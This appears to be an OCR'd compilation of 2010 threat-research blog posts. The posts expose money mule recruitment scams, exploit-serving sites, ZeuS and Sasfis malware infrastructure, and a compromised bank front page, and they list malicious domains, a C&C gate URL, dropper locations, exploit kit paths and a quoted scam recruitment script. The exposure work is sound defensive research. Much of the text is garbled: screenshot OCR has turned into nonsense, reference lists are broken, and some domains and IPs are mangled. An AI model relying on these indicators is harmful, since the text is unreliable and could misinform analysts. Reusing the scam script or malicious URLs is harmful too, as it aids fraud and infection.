Keeping the money mules on a short leash series, are prone to expand. Stay tuned! 


Related coverage of money laundering in the context of cybercrime: 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[12]Money Mule Recruiters on Yahoo!’s Web Hosting 

[13]Dissecting an Ongoing Money Mule Recruitment Campaign 
[14]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[15]Keeping Reshipping Mule Recruiters on a Short Leash 
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[16]Keeping Money Mule Recruiters on a Short Leash 
[17]Standardizing the Money Mule Recruitment Process 
[18]Inside a Money Laundering Group’s Spamming Operations 
[19]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[20]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him [22]on Twitter. 


1. http: //ddanchev. blogspot .com/2010/02/dissecting-ongoing-money-mule.htm 


2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2009-1492 
3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2007-5659 


4. http://www. google. com/safebrowsing/diagnostic?site=http://ceffincfin.com/khl=e 
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. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on.htm 


16. 
17. 

. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming. htm 
19. 
20. 

1. 
22. 


6.3.13 Money Mule’ Recruitment Campaign Serving’ Client-Side Exploits 
(2010-03-30 18:51) 
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Remember [1]Cefin Consulting & Finance, the bogus, money mule recruitment company that 
ironically tried to recruit me last month? 


They are back, with a currently ongoing money mule recruitment campaign, this time 
not just attempting to recruit gullible users, but also, serving client-side exploits ([2]CVE- 
2009-1492; [3]CVE-2007-5659) through an embedded javascript on each and every page 
within the recruitment site. 
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Let’s dissect the campaign, expose the client-side exploits serving domains, the Zeus- 
crimeware serving domains parked within the same netblock as the mule recruitment site 
itself, to ultimately expose a bogus company for furniture hosting a pretty descriptive cv.exe 
that is dropped on the infected host. 


Initial recruitment email sent from financialcefin@aol.com: 
Hello, Our Company is ready to offer full and part time job in your region. It is possible 
to apply for a well-paid part time job from your state. More information regarding working and 


cooperation opportunities will be sent upon request. Please send all further correspondence 
ONLY to Company’s email address: james.mynes.cf@gmail.com Best regards 


Response received: 


Greetings, 


Cefin Consulting & Finanace company thanks you for being interested in our offer. All addi- 
tional information about our company you may read at our Official site. www.ceffincfin.com 
Below the details of vacancy operational scheme: 


3238 


1. The payment notice and the details of the beneficiary for further payment transfer 
will be e-mailed to your box. All necessary instructions regarding the payment will be enclosed. 


2. As a next step, you’ll have to withdraw cash from our account. 

3. Afterwards you shall find the nearest Western Union office and make a transfer. Im- 
portant: Only your first and last names shall be mentioned in the Western Union Form! No 
middle name (patronymic) is written! Please check carefully the spelling of the name, as it 
has to correspond to the spelling in the Notice. 


4. Go back home soonest possible and advise our operator on the payment details (Sender’s 
Name, City, Country, MTCN (Money Transfer Control Number), Transfer Amount). 


5. Our operator will receive the money and send it to the customer. 


6. Please be ready to accept and to make similar transfers 2-5 times a week or even 
more often. Therefore you have to be on alert to make a Western Union payment any time. 
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Should you face any problems incurred in the working process, don’t hesitate to contact our 
operator immediately. If you have any questions, please do not hesitate to contact us by 
e-mail. If you have understood the meaning of work and ready to begin working with us, 
please send us your INFO in the following format: 


1) First name 2) Last name 3) Country 4) City 5) Zip code 6) Home Phone number, Work 
Phone number, Mobile Phone number 7) Bank account info: a) Bank name b) Account name 
c) Account number d) Sort code 8) Scan you passport or driver license 


2010 © Cefin Consulting & Finance 
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Money mule recruitment URL: ceffincfin.com - 93.186.127.252 - Email: win- 
ter343@hotmail.com - [4]currently flagged as malicious. 


Once obfuscated, the javascript attempts to load the client-side exploits serving URL click- 
clicker.com /click/in.cgi?3 - 195.78.109.3; 195.78.108.221 - Email: aniwaylin@yahoo.com, or 
click-clicker.com - 195.78.109.3 - Email: aniwaylin@yahoo.com. 


Sample campaign structure: 


- click-clicke.com /cgi-bin/plt/n006106203302r0009R81fc905cX409b - 
2ddfY0a607663Z0100f055 


"click reklama.com 


click-clicke.com 
91.213.174.0/24 ——“S-g» as29106 


click-reklama.com 


hostmasterclick-reklama.com 


Parked on the same IP (91.213.174.52) are also the following client-side exploit serving 
domains: 


click-reklama.com - Email: tahli@yahoo.com 


googleinru.in - Email: mirikas@gmail.com 


Within AS29106, VolgaHost-as PE Bondarenko Dmitriy Vladimirovich, we also have the 
following client-side exploits/crimeware friendly domains: 
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benlsdenc.com - Email: blablaman25@gmail.com 
nermdusa.com - Email: polakurt69@gmail.com 
mennlyndy.com - Email: albertxx|@gmail.com 
kemilsy.com - Email: VsadlusGruziuk@gmail.com 


benuoska.com - Email: godlikesme44@gmail.com 
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Name server of notice nsl.ginserdy.com - 93.186.127.205 - Email: albertxxlI@gmail.com 
and ns1.ndnsgw.net - 195.78.109.3 - Email: aniwaylin@yahoo.com. have been also registered 
using the same emails as the original client-side exploit serving domains. 


Sample detection rates, and phone back locations: 
- cefin.js - [5]Troj/IFrame-DY - Result: 1/42 (2.39 %) 


- clicker.pdf - [6] 


Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EM 


- Result: 21/42 (50.00 %) 


- Clicker2.exe - [7]TR/Sasfis.akdv.1; Trojan.Sasfis.akdv.1; Trojan.Win32.Sasfis.akdv - Re- 
sult: 18/42 (42.86 %) 


- cv.exe - [8] Trojan.Siggen1.15304 - Result: 3/42 (7.15 %) 


- L.exe - [9]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %) 
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Upon execution, the sample phones’ back to _ Oficla/Sasfis C &C at socks- 
bot.com /isb/gate.php?magic=121412150001 &ox=2-5-1-2600 &tm=3 &id=24905431 
&cache=4154905385 & - 195.78.109.3 - Email: aniwaylin@yahoo.com which drops pozi- 
tiv.md/master/cv.exe - 217.26.147.24 - Email: v.pozitiv@mail.ru from the web site of a fake 
company for furniture (PoZITIVe SRL). 


Interestingly, today the update location has been changed to tds-style.spb.ru /error/1.exe. 
Detection rate: 


- L.exe - [10]Suspicious:W32/Malware!Gemini - Result: 4/42 (9.53 %) 


Keeping the money mules on a short leash series, are prone to expand. Stay tuned! 
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Related coverage of money laundering in the context of cybercrime: 
[11]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[12]Money Mule Recruiters on Yahoo!’s Web Hosting 

[13]Dissecting an Ongoing Money Mule Recruitment Campaign 
[14]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[15]Keeping Reshipping Mule Recruiters on a Short Leash 
[16]Keeping Money Mule Recruiters on a Short Leash 
[17]Standardizing the Money Mule Recruitment Process 

[18]Inside a Money Laundering Group’s Spamming Operations 
[19]Money Mule Recruiters use ASProx’s Fast Fluxing Services 


[20]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [21]Dancho Danchev’s blog. Follow him [22]on Twitter. 


1. http: //ddanchev. blogspot .com/2010/02/dissecting- ongoing-money-mule. html 


2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE- 2009-1492 
3. http://cve.mitre.org/cgi-bin/cvename .cgi?name=CVE- 2007-5659 


4. http://www. google.com/safebrowsing/diagnostic?site=http://ceffincfin.com/khl=e 


5. ttp://www.virustotal.com/analisis/20d56cbab6bfa901d94e5d9ce377ae9cbaf 4e91f f5a283751d43f 3c0ebb44eb5- 12698 
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. http: //ddanchev.blogspot .com/2009/05/inside-money-laundering-groups- spamming .htm 


. http: //ddanchev.blogspot . com/2008/07/money-mule-recruiters-use-asproxs-fast .htm 


20. http: //ddanchev. blogspot .com/2008/10/money-mules-syndicate-actively.htm 
21. http://ddanchev.blogspot.com/ 
22. http://twitter.com/danchodanche 
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6.4.1 Summarizing Zero Day’s Posts for March (2010-04-01 10:58) 
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get back to the basxs 


Key summary points on the percentage of flaws mitigated 


ad the rest of thes entry » Get the iberating 
Merger paeches 10 power of the 
woetd-class 
BlackBerry 
expenence-the full 


Mareh 30th, 2010 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for March, 2010. 


You [2]can also go through [3]previous summaries, as well as subscribe to my [4]per- 
sonal RSS feed, [5]Zero Day’s main feed, or follow me on Twitter: 
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Recommended reading - [6]JTROYAK-AS: the cybercrime-friendly ISP that just won’t go away ; 
[7]The current state of the crimeware threat - Q &A and [8]From Russia with (objective) spam 
stats 


01. [9]Police arrest Mariposa botnet masters, 12M+ hosts compromised 
02. [10]Vodafone HTC Magic shipped with Conficker, Mariposa malware 
03. [11]Mac OS X SMS ransomware - hype or real threat? + [12]Gallery 
04. [13]TROYAK-AS: the cybercrime-friendly ISP that just won’t go away 
05. [14]Facebook password reset themed malware campaign in the wild 
06. [15]The current state of the crimeware threat - Q &A 

07. [16]From Russia with (objective) spam stats 

08. [17]Survey: Millions of users open spam emails, click on links 

09. [18] Trivial security flaw in popular iPhone app leads to privacy leak 
10. [19]Report: 64 % of all Microsoft vulnerabilities for 2009 mitigated by Least Privilege 
accounts 


This post has been reproduced from [20]Dancho Danchev’s blog. Follow him [21]on Twitter. 


. http://blogs.zdnet.com/securit 
. http: //ddanchev.blogspot.com/2010/03/summarizing-zero-days-posts- for .htm 


ttp://ddanchev.blogspot.com/2010/02/summarizing-zero-days-posts-for- january. htm 


. http://updates.zdnet .com/tags/dancho+danchev. html1?t=0&és=0&0=1&mode=rss 
. http: //feeds. feedburner .com/zdnet/security 
; 
?p=581 
?p=558 
10. http://blogs.zdnet .com/security/?p= 
11. http://blogs.zdnet .com/security/?p=573 
12. http://content .zdnet .com/2346-12691_22-403883.htm 
13. http://blogs.zdnet .com/security/?p=576 
14. http://blogs.zdnet .com/security/?p=578 
15. http://blogs.zdnet .com/security/?p=579 
16. http://blogs.zdnet.com/security/?p=581 
17. http://blogs.zdnet .com/security/?p= 
18. http://blogs.zdnet .com/security/?p=593 
19. http://blogs.zdnet .com/security/?p=5964 
20. http://ddanchev.blogspot.com/ 
21. http://twitter.com/danchodanche 
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6.4.2 Keeping Money Mule Recruiters on a Short Leash - Part Four (2010-04-09 10:54) 


Ortex Group 


How site works? 


1. Post and track your vacancies, RFPs and projects 
2. Find affordable freelancers or full-time staff 
3. Get work done below budget and make profit 


About the Company 

Welcome %9 the world of Ovtsouraing Never has 3 phenomenon been 50 all encompassing and Authorization 
emoowenn, lite outouraing Transcending beyond an ingusty's vertcal segments. outsourcing has Enter to partners area 

become the "by Getautl” strategy for a8 proét coms@ous orgarsratons Mat stupzie to retain Mew winren; . 

Steak and tegh proitabety Today's scenans in He business world ts more competOve Man what € was in Login: * 

the past There ts a growing reakzabon fist wisdom bes in Comsclksating Re core competency turxtons and § Loge | 
outsourang the supplement We are an coline services marketplace in USA and Aust ata Our 9oal is to Peepane nelle : 
emoower businesses wih He asohse freedom to choose where to outsource Her business needs to Regisaten Fengel peseuved 
maumice Dew competOve advartaze We beteve Mat Money saved due to cutscurcng can be eBectvely 

and succes siuly utized to focus more on strategic and core businesses furxdons” 

Our service Latest projects 


© WordPress of Ming 


(T Programeners 
Customer Serices 
Call Centers 
Back Ot8ce Functons 
Payroll 
So@ware Devetoomert 
Wed prog ammrang 
Graphecs & document Conversions 


1s Design & Developer 


) : om US : Ned 0 
‘You can easily find feelancers anc service ferns for US, india, Australia, Russia, Romania, Ubraine, UK tnd Web Designer 


Pritipgine, Moktova and ciher Counties. Wiy waste pour precious ime in finding service provider when Pty 07 Apr# 2090 

are locking fer you Send us your senice requirements as project and let professional freelancers and © Unut Develcomert 

service firms compete. Utiice Orter Group 25 the platicem to cutscurce all your business needs. As an O7 Aged 2090 

eficient coline outsourcing facilitater, Ortex Croup trings togeter buyers and serdce providers. R helps Ne © Wordpress Dev wth POOSoms Expenence 


UPDATED: Saturday, April 10, 2010: Some of the mule recruitment sites appear to be 
interested in something else, rather than recruiting mules - must be the oversupply of people 
unknowingly participating in the cybercrime ecosystem. 


Several of the domains (for instance ortex-gourpinc.tw and augmentgroupinc.tw) are 
not accepting registrations, instead, but are attempting to trick the visitor into downloading 
and executing a bogus psychological test. 


"Below is a test prepared by professional psychologists and is required in order to be 
considered a competent candidate for the offered position. After successful completion of 
your test, you will be asked to register on our web site. If you are not ready to register right 
away, please wait to take the test at a later point. To REGISTER, simply run the test and you 
will be prompted to click on the "Register Now" button at any time and you will be redirected 
to the login page, without having to take the test again. 
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Ortex Group 


7 
» 


BS 
BK 
§ 


How site works? 


1. Post and track your vacancies, RFPs and projects 
2. Find affordable freelancers or full-time staff 
3. Get work done below budget and make profit 


Below is a test prepared by professional psychologists and is required in coder to Be considered 3 
Competent Candidate for He CBeted posmon 
AMGt SuUCCESSRE COMpIEREN of your lest yOU will De ashed fo fegister On Cul wed sée If you are Not ready 1 Authorization 
register ght away, please wal to lake Te test at a later point 
To REGISTER, simply run the test and you will be prompted to click on Ihe "Register Now” Buffon af any tne 
ated you will De rechrected to he bogin pape. without hut; to take he test again Logit * J 
“This test ts under Gevelopment and we are oratetsl for a Comments and suppesbors 

Download test Regisraton Forget passweed? 
“H you are having trouble munity the test and your Computer is requesting adeninéstrabve Nghts. download 
the lest and simply Night-ciick on the Test con and select “Roun As Admunistator fom the menu 


Enter to parhers area 


Latest projects 
Graptec Design Bloggers Neeser 
09 Aprt 2090 


Backend Developer Socal Contest protiies 


*This test is under development and we are grateful for all comments and suggestions." *If 
you are having trouble running the test and your computer is requesting administrative rights, 
download the test and simply right-click on the Test icon and select "Run As Administrator" 
from the menu." 


- [1]testAugmentinc.exe - Result: 3/38 (7.9 %) - Trojan/Win32.Chifrax.gen; Reser.Reputation.1 
- [2]testOrtexGroup.exe - Result: 3/39 (7.7 %) - Trojan/Win32.Chifrax.gen; Reser.Reputation.1 


UPDATED: AS34305, EUROACCESS has taken down the IPs within their network. The 
money mule recruiters naturally have a contingency plan in place, and have migrated to 
[3]AS38356 - [4]TimeNet (222.35.143.112; 222.35.143.234; 222.35.143.235; 222.35.143.237) 
and AS21793 - GOGAX (76.76.100.2; 76.76.100.4; 76.76.100.5). 
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Based on the already established patterns of this group, it was only a matter of time until they 
re-introduced yet another portfolio of money mule recruitment domains, combining them with 
spamvertised recruitment messages, and forum postings. 


Just like their campaign from last month ([5]Keeping Money Mule Recruiters on a Short 
Leash - Part Three) the current one is once again interacting exclusively with AS34305, 
EUROACCESS Global Autonomous System, including the newly introduced name servers. 


What has changed? It’s the [6]migration towards the use of fast-flux infrastructure for 
ZeuS crimeware serving campaigns, and in an isolated incident profiled in this post, a money 
mule recruitment campaign that’s also sharing the same fast-flux infrastructure. Combined 
with the BIZCN.COM, INC. domain registrar’s practice of accepting domain registrations using 
example.com emails, next to ignoring domain suspension requests - you end up with the 
perfect safe haven for a cybercrime operation. 
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In March, 2010, it took EUROACCESS less then 10 minutes to undermine their cam- 
paigns, including ones residing within the AS of a cybercrime friendly customer known 
as 193.104.22.0/24 KratosRoute. However, it’s interesting to observe their return to the 
same ISP, given that they were within a much more cybercrime-friendly neighborhood once 
EUROACCESS kicked them out last month. 


Although the take down activities from last month may seem to have a short-lived effect, now 
that they’re not only back, but are once again abusing EUROACCESS, the loss of OPSEC (op- 
erational security) did happen, just like it happened in the wake of the [7 ]TROYAK-AS takedown. 


Let’s dissect the currently ongoing campaign, and emphasize on a second money mule 
recruitment campaign, that’s not just using a fast-flux infrastructure, but is also connected to 
hilarykneber@yahoo.com ([8]The Kneber botnet - FAQ). 


imgroupinc. tw 
augmentgroupinc. tw 


roup,.com 
é-groupfine.net 
Imgrou) 
optimus-grot 


foreaim-group.com 


impact-groupnet.com 


-groupmain,. net 


1 

1 

il 

1 

1 

rik 
oupmain.net 04.1 
4.1 
1 

1 

1 

1 

1 


4.106,30 
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Spamvertised, and parked domains on 85.12.46.3; 85.12.46.2; 193.104.106.30 - AS34305, 
EUROACCESS Global Autonomous System are as follows: 
altitudegroupinc.tw - Email: weds@fastermail.ru 
altitude-groupli.com - Email: mylar@5mx.ru 
altitude-groupmain.tw - Email: gutsy@qx8.ru 
amplitude-groupmain.net - Email: tabs@5mx.ru 
arvina-groupco.tw - Email: hv@qx8.ru 
arvina-groupinc.tw - Email: jerks@5mx.ru 
arvina-groupnet.cc - Email: mat.mat@yahoo.com 
asperity-group.com - Email: okay@qx8.ru 
asperitygroup.net - Email: cde@freenetbox.ru 
asperitygroupinc.tw - Email: ti@fastermail.ru 
asperity-groupmain.tw - Email: gutsy@qx8.ru 
astra-groupnet.tw - Email: logic@qx8.ru 
astra-groupinc.tw - Email: gv@fastermail.ru 
augment-group.com - Email: mylar@5mx.ru 
augmentgroup.net - Email: glean@fastermail.ru 
augmentgroupinc.tw - Email: weds@fastermail.ru 
augment-groupmain.tw - Email: gutsy@qx8.ru 
celerity-groupmain.net - Email: cde@freenetbox.ru 
celerity-groupmain.tw - Email: weds@fastermail.ru 
excel-groupco.tw - Email: thaws@bigmailbox.ru 
excel-groupsvc.com - Email: carlo@qx8.ru 
fincore-groupllic.tw - Email: jerks@5mx.ru 
fecunda-group.com - Email: okay@qx8.ru 
fecundagroupllc.tw - Email: omega@fastermail.ru 
fecunda-groupmain.net - Email: mylar@5mx.ru 
fecunda-groupmain.tw - Email: ti@fastermail.ru 
foreaim-group.com - Email: cde@freenetbox.ru 
foreaimgroup.net - Email: glean@fastermail.ru 
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foreaimgroupinc.tw - Email: gutsy@qx8.ru 
foreaim-groupmain.tw - Email: weds@fastermail.ru 
impact-groupinc.net - Email: cde@freenetbox.ru 
impact-groupnet.com - Email: okay@qx8.ru 
luxor-groupco.tw - Email: logic@qx8.ru 
luxor-groupinc.cc - Email: mat.mat@yahoo.com 
luxor-groupinc.tw - Email: gv@fastermail.ru 
magnet-groupco.tw - Email: gv@fastermail.ru 
magnet-groupinc.cc - Email: mat.mat@yahoo.com 
millennium-groupco.tw - Email: thaws@bigmailbox.ru 
millennium-groupsvc.tw - Email: thaws@bigmailbox.ru 
optimusgroupnet.cc - Email: mat.mat@yahoo.com 
optimus-groupsvc.tw - Email: jerks@5mx.ru 
ortex-gourpinc.tw - Email: clad@bigmailbox.ru 
ortex-groupinc.cc - Email: mat.mat@yahoo.com 
pacer-groupnet.tw - Email: omega@fastermail.ru 
point-groupco.tw - Email: wxy@qx8.ru 
point-groupinc.cc - Email: mat.mat@yahoo.com 
spark-groupco.tw - Email: clad@bigmailbox.ru 
spark-groupsv.tw - Email: clad@bigmailbox.ru 
spark-groupsvc.com - Email: trim@freenetbox.ru 
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synapse-groupfine.net - Email: okay@qx8.ru 
synapse-groupinc.tw - Email: omega@fastermail.ru 
synapsegroupli.com - Email: tabs@5mx.ru 
target-groupinc.cc - Email: mat.mat@yahoo.com 
tnm-group.tw - Email: troop@bigmailbox.ru 
tnmgroupinc.com - Email: tabs@5mx.ru 
tnmgroupsvc.net - Email: tabs@5mx.ru 


starlingbusinessgroup.com - 212.150.164.201 - Email: tahli@yahoo.com (spamvertised 


separately from the campaign) 


Newly introduced name servers: 

ns3,sandhouse.cc - 74.118.194.82 - Email: taunt@freenetbox.ru 
nsl.volcanotime.com (Parked on the same _ IP is also nsil,jockscreamernet 
free@freenetbox.ru) - 64.85.174.144 - Email: hs@bigmailbox.ru 

ns2.weathernot.net - (Parked on the same IP is also ns2.worldslava.cc 
fussy@bigmailbox.ru) 204.12.217.252 - Email: bowls@5mx.ru 

nsl.uleaveit.com - 64.85.174.146 - Email: plea@qx8.ru 

ns2.pesenlife.net - 204.112.217.254 - Email: erupt@qx8.ru 

ns3.greezly.net - 204.124.182.151 - Email: erupt@qx8.ru 


Name servers known from previous campaigns remain active, using AS34305: 
nsl.chinegrowth.cc - 92.63.111.196 - Email: duly@fastermail.ru 
ns1.partytimee.cn - 92.63.111.196 - Email: chunk@qx8.ru 
ns1.benjenkinss.cn - 92.63.110.85 - Email: chunk@qx8.ru 
nsl.translatasheep.net - 92.63.111.127 - Email: stair@freenetbox.ru 
nsl1,bizrestroom.cc - 92.63.110.85 - Email: hook@5mx.ru 

ns2.alwaysexit.com - 85.12.46.2 - Email: soo@bigmailbox.ru 

ns2.trythisok.cn - 85.12.46.2 - Emaik: chunk@qx8.ru 


Email: 


Email: 


It’s been a while, since | came across a money mule recruitment campaign using fast- 
flux infrastructure ([9]Money Mule Recruiters use ASProx’s Fast Fluxing Services) that’s also 
currently being used by domains registered using the same emails as the original Hilary 
Kneber campaigns ([10]Celebrity-Themed Scareware Campaign Abusing DocStoc) from 
December, 2009, as well as related mule recruitment campaigns ([11]Dissecting an Ongoing 


Money Mule Recruitment Campaign) from February, 2010. 
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Latest Mews Asap Financial Group - A Decade of Superannuation Experience 
Asap Financial Group 15 2 Drwvately Owned adEory Company SPeGIETING 


73.06.09 . Asap Financiat Geoup in CoMperate Super anMUIBEN afd Group NSUTANCE We wor wih 
aoponted advisers to the Coogee COPD SFHES CF every BADe ard IngUBty ICrO5S Austral in Gesigning a 
Chemicats Asap Financial Group Superarmusben plan t sul Nei spect: needs and enhance employee 
has been appointed as nentcang Sabstacton Our fiteen year history has earned us a reputsbon 35 3 
Basar to The Coogee Chemicals Jeader in Comper ate Super armusBEN afd we Ode Ourselves on delivEnty; 


CORPOTENENSIe, @2iy UNIErSIIOd 2OvIKe 3nd eGucabon to help cur 


Rees Mere Members actorve inancal security post retremert 


Stemap Copyigtt Disclamer Privacy 


Moreover, one of the domains sharing the fast-flux infrastructure with the money mule 
recruitment site asapfinancialgroup.com - Email: admin@asapfinancialgroup.com, was also 
profiled in last month’s "[12]Zeus Crimeware/Client-Side Exploits Serving Campaign in the 
Wild". 


3255 


4.2. The present Agreement signed by the means of facsimile or e-mail communication, stands good 
in law. The present Agreement shall remain in force from the moment if it’s signing by the Parties 
¢* 2010) for the period of | (one) year, unless terminates earlier (with | 
(one) week before notice required) in accordance with the terms of this Agreement. 

By: 


Contractor's first and last name hare Contractor's signature here 


By: ASAP Financial Group Pty Ltd, 
3 Reading Ln, East Killara, 
NSW, 2122, Australia 


ABN: 36 138 034 830 


The following ZeuS crimeware, client-side exploits service, and malware phone back C &C 
domains, all share the same fast-flux infrastructure: 

allaboutcOntrol.cc - Email: Hilarykneber@yahoo.com 

[13]agreement52.com - Email: Davenport@example.com 

[14]smotri123.com - Email: smot-smot@yandex.ru - [15]C &C profiled last month 
jdhyh1230jh.net - Email: None@aol.com 

[16]mabtion.cn - Email: Michell.Gregory2009@yahoo.com 

[17]wooobo.cn - Email: Michell.Gregory2009@yahoo.com 

[18]mmjl3l45lkjbdb.ru - Email: none@none.com 

[19]domainsupp.net - Email: Ernest/Booth@example.com 
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first-shockabsorbers.com - Email: ring.redlink@yandex.ru 

this-all-clean.info - Email: ring.redlink@yandex.ru 

f45rugfj98hj9hjkfrnk.com - Email: holsauto@live.com 

[20]financialdeposit.com - Email: crWright@gmail.com 

connectanalyst.com - Email: Mildred44@gmail.com - NOT ACTIVE 

vmnrjiknervir.com - Email: holsauto@live.com - NOT ACTIVE 

[21]longtermrelations.com - Email: admin@schumachercomeback.com - NOT ACTIVE, SUS- 
PENDED 


Name servers of the fast-fluxed domains include: 

ns1.hollwear.com - 87.239.22.240 - Email: kymboll@rocketmail.com 
nsl.kentinsert.net - 64.120.135.214 - Email: rackmodule@writemail.com 
nsl1.dimplemolar.net - 207.126.161.29 - Emaik: carruawau@gmail.com 
nsl.megapricelist.net - 66.249.23.63 - Email: jobwes@clerk.com 
ns1.bighelpdesk.net - 76.10.203.46 - Email: galaxegalaxe@gmail.com 
ns1.linejeans.com - 95.211.86.140 - Email: palmatorz@aol.com 
nsl.ceberlin.com - 204.12.210.235 


EUROACCESS have been notified, an updated will be posted as soon as they take care 
of the campaign. 


Related coverage of money laundering in the context of cybercrime: 
[22]Money Mule Recruitment Campaign Serving Client-Side Exploits 
[23]Keeping Money Mule Recruiters on a Short Leash - Part Three 
[24]Money Mule Recruiters on Yahoo!’s Web Hosting 

[25]Dissecting an Ongoing Money Mule Recruitment Campaign 
[26]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[27]Keeping Reshipping Mule Recruiters on a Short Leash 
[28]Keeping Money Mule Recruiters on a Short Leash 
[29]Standardizing the Money Mule Recruitment Process 

[30]Inside a Money Laundering Group’s Spamming Operations 
[31]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[32]Money Mules Syndicate Actively Recruiting Since 2002 
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This post has been reproduced from [33]Dancho Danchev’s blog. Follow him [34]on Twitter. 


1. ttp://www.virustotal.com/analisis/addea49904439a9b3e6a5b6 15466c55c9935354d3da4a7d6balbf2f51d6e8d47- 12709 
2. ttp://www.virustotal.com/analisis/f4dbd83b19eef7177ca7409151f 1bdab6d297 9ca08a3ba6e8a285cdb5230850d- 12709 
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. https: //zeustracker.abuse.ch/monitor . php?as=38356 


http://www. google. com/safebrowsing/diagnostic?site=AS : 38356 


- http: //ddanchev. blogspot . com/2010/03/keeping-money-mule-recruiters-on-short .html 
. http://www. abuse . ch/7p=2515 

. http: //blogs.zdnet .com/security/?p=5761 

- http: //blogs. zdnet . com/security/7p=5508 

. http: //ddanchev. blogspot . com/2008/07/money-mule-recruiters-use-asproxs~fast html 
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10. http://ddanchev.blogspot .com/2009/12/celebrity-themed-scareware-campaign_07.htm 
11. 

12. http: //ddanchev.blogspot .com/2010/03/zeus-crimewareclient-side-exploits.htm 

13, 

14. https://zeustracker.abuse.ch/monitor.php?host=smotri123.com 


15. http: //ddanchev.blogspot.com/2010/03/zeus-crimewareclient-side-exploits.htm 
16. : : : 2 7 = 

17. http://dnsbl.abuse.ch/fastfluxtracker . php?domainid=686 

18. https://zeustracker.abuse.ch/monitor.php?host=mmj131451kjbdb.r 

19. : F j j 7 = 

20. http://dnsbl.abuse.ch/fastfluxtracker . php?domainid=688 


21. https://zeustracker.abuse.ch/monitor .php?host=longtermrelations.com 
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22. http://ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving. htm 
23. http: //ddanchev. blogspot .com/2010/03/keeping-money-mule-recruiters-on-short.htm 
24. http: //ddanchev. blogspot .com/2010/03/money-mule-recruiters-on-yahoos-web.htm 

25. http: //ddanchev. blogspot .com/2010/02/dissecting-ongoing-money-mule.htm 

26. http: //ddanchev. blogspot .com/2010/02/keeping-money-mule-recruiters-on-short.htm 


. http: //ddanchev. blogspot .com/2009/12/keeping-reshipping-mule-recruiters-on. htm 


28. 
29. 

. http: //ddanchev. blogspot . com/2009/05/inside-money- laundering-groups- spamming .htm. 
32. 
33. 
34. 


W 
pa 
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6.4.3 Dissecting Northwestern Bank’s Client-Side Exploits Serving Site Compromise 
(2010-04-12 12:03) 


Northwestern)a/\\ 


It’s one thing to indirectly target a bank’s reputation by brand-jacking it for phishing or 
malware servince purposes, and entirely another when the front page of the bank (North- 
WesternBankOnline.com) itself is embedded with an iFrame leading to client-side exploits, to 
ultimately serve a copy of [1]Backdoor.DMSpammer. 


¢ Go through an assessment of a similar incident from 2007 - [2]Bank of India Serving 
Malware 


This is exactly what happened on Friday, with the front page of the [3]Northwestern Bank of 
Orange City and Sheldon, lowa acting as an infection vector. And although the site is now 
clean, the compromise offers some interesting insights into the multitasking on behalf of some 
of the most prolific malware spreaders for Q1, 2010. 


* Go through assessments of their previous campaigns: [4]Scareware, Sinowal, Client- 
Side Exploits Serving Soam Campaign in the Wild; [5]AS50215 Troyak-as Taken Offline, 
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Zeus C &Cs Drop from 249 to 181; [6]Outlook Web Access Themed Spam Campaign 
Serves Zeus Crimeware; [7]Pushdo Serving Crimeware, Client-Side Exploits and Rus- 
sian Bride Scams; [8]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in 
the Wild; [9]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild; 
[10]IRS/PhotoArchive Themed Zeus/Client-Side Exploits Serving Campaign in the Wild) 


How come? The iFrame domain used in the Northwestern Bank’s campaign, is parked on the 
very same IP (59.53.91.192 - AS4134, CHINA-TELECOM China Telecom) that is still active, and 
was profiled in last month’s spamvertised "[11]Zeus Crimeware/Client-Side Exploits Serving 


Campaign in the Wild" campaign. 


Phoenix Exploit's Kit 


The iFrame embedded on the front page of Northwestern Bank’s web site, mumukafes.net 
/trf/index.php - 59.53.91.192 - Email: mated@freemailbox.ru, redirects through the following 
directories, to ultimately attempt to serve client-side exploits through the copycat Phoenix 
Exploit Kit web malware exploitation kit: 


- mumukafes. net /trf/index.php - 59.53.91.192 - Email: mated@freemailbox.ru 
- sobakozgav.net /index.php - 59.53.91.192 
- sobakozgav.net /tmp/newplayer.pdf - CVE-2009-4324 
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- sobakozgav.net /I.php?i=16 

- sobakozgav.net /statistics.php 

Parked on the same IP (59.53.91.192) are also the following domains, all of which have 
been seen serving client-side exploits in previous campaigns: 
aaa.fozdegen.com - Email: mated@freemailbox.ru 
bbb.fozdegen.com - Email: mated@freemailbox.ru 
cogs.trfafsegh.com - Email: maple@qx8.ru 

countrtds.ru - Email: thru@freenetbox.ru 

dogfoog.net - Email: drier@qx8.ru 

eee.fozdegen.com - Email: mated@freemailbox.ru 
fff.sobakozgav.net - Email: mated@freemailbox.ru 
fozdegen.com - Email: mated@freemailbox.ru 
Ill.sobakozgav.net - Email: mated@freemailbox.ru 
mumukafes.net - Email: mated@freemailbox.ru 
sobakozgav.net - Email: mated@freemailbox.ru 
trfafsegh.com - Email: maple@qx8.ru 


* countrtds.ru 
aaa fozdegen.com 
bbb.fozdegen.com 
cogs.trfafsegh.com 

countrtds.ru 

dogfoog.net A & 
yo s9sae11e2 )— tl 59.52.0.0/14 ——AS.ge as4iz4 

fozdegen.com ‘A 

mail.dogfoog.net 
mail.stopspaming.com 

mail.trfafsegh.com 

sobakozgav.net 


trafsegh.com 
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Moreover, there are also active [12]ZeuS C &Cs on the same IP - 59.53.91.192, with the 
following detection rates for the currently active binaries: 

- exel.exe - [13]Trojan/Win32.Zbot.gen; Trojan-Spy.Win32.Zbot - Result: 32/38 (84.22 %) 

